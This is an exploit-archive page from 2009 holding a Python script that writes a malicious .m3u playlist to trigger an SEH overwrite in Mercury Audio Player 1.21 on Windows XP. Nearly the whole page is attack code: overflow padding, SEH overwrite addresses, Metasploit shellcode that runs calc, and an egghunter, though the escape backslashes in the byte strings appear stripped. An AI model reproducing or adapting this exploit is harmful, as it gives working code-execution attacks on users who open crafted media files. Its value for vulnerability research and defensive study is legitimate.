map121m3u-overwrite.txt
Posted on 03 May 2009
#usage: exploit.py #Note : Exploit take about 30 seconds to work. print "**************************************************************************" print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit " print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 (EN) " print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com " print "**************************************************************************" buff = "x41" * 16740 next_seh = "xEBx06x41x42" seh = "xB8x15xD1x72" #msacm32.drv # win32_exec - EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com shellcode = ( "DZ27DZ27"+"x90x90x90x90x90x90x90x90" "x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x22xd1xdc" "x59x83xebxfcxe2xf4xdex39x98x59x22xd1x57x1cx1ex5a" "xa0x5cx5axd0x33xd2x6dxc9x57x06x02xd0x37x10xa9xe5" "x57x58xccxe0x1cxc0x8ex55x1cx2dx25x10x16x54x23x13" "x37xadx19x85xf8x5dx57x34x57x06x06xd0x37x3fxa9xdd" "x97xd2x7dxcdxddxb2xa9xcdx57x58xc9x58x80x7dx26x12" "xedx99x46x5ax9cx69xa7x11xa4x55xa9x91xd0xd2x52xcd" "x71xd2x4axd9x37x50xa9x51x6cx59x22xd1x57x31x1ex8e" "xedxafx42x87x55xa1xa1x11xa7x09x4ax21x56x5dx7dxb9" "x44xa7xa8xdfx8bxa6xc5xb2xbdx35x41xd1xdcx59") #[*] x86/alpha_mixed succeeded with size 126 (iteration=1) egghunter=( "x89xe5xdaxd9xd9x75xf4x5ex56x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x45x36x4dx51x48x4ax4bx4fx44x4fx51x52x46x32x42" "x4ax45x52x46x38x48x4dx46x4ex47x4cx45x55x51x4a" "x44x34x4ax4fx48x38x47x34x50x5ax50x32x50x37x4c" "x4bx4bx4ax4ex4fx43x45x4bx5ax4ex4fx42x55x4bx57" "x4bx4fx4dx37x41x41") exploit = buff + shellcode + next_seh + seh + egghunter + "x90"*7 try: out_file = open("exploit.m3u",'w') out_file.write(exploit+".mp3") out_file.close() raw_input(" Exploit file created! ") except: print "Error"
